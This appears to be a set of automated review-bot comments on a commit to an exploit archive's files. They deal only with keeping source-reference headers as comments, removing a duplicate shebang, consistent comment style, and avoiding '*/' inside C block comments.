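Review bot: The platforms/php/webapps/30036.html hunk replaces the `source: http://www.securityfocus.com/bid/23965/info` line with an empty line, discarding the only provenance reference in the file. Elsewhere in this commit the same kind of header is preserved as a comment (`# source:` in 19498.sh and 23141.sh, `/* source: ... */` in 19220.c and 28225.c); for consistency keep it here as an HTML comment, `<!-- source: http://www.securityfocus.com/bid/23965/info -->`, rather than a blank line.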
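Review bot: The platforms/sco/local/23141.sh hunk has the same duplicate-shebang problem as 19498.sh: `+#!/bin/sh` goes in at line 1 while the original `#!/bin/sh` and `#` remain as trailing context, so one of the two should be removed. Also, the new comment lines here are written `#source:` and `#It has been reported ...` with no space after `#`, whereas 19498.sh in this same commit uses `# source:`; pick one style for the batch.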
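Review bot: In the second platforms/windows/remote/28225.c hunk (`@@ -5,10 +6,9 @@`) the `+*/` correctly closes the `/*` opened in the first hunk before the pre-existing `/*-----` comment begins, so there is no nested-comment problem. One caveat for this and the matching 19220.c change: wrapping free-form advisory text in a C block comment only compiles as long as the text never contains `*/`; a quick `grep -n '\*/'` over the wrapped region before committing guards against that for future files handled the same way.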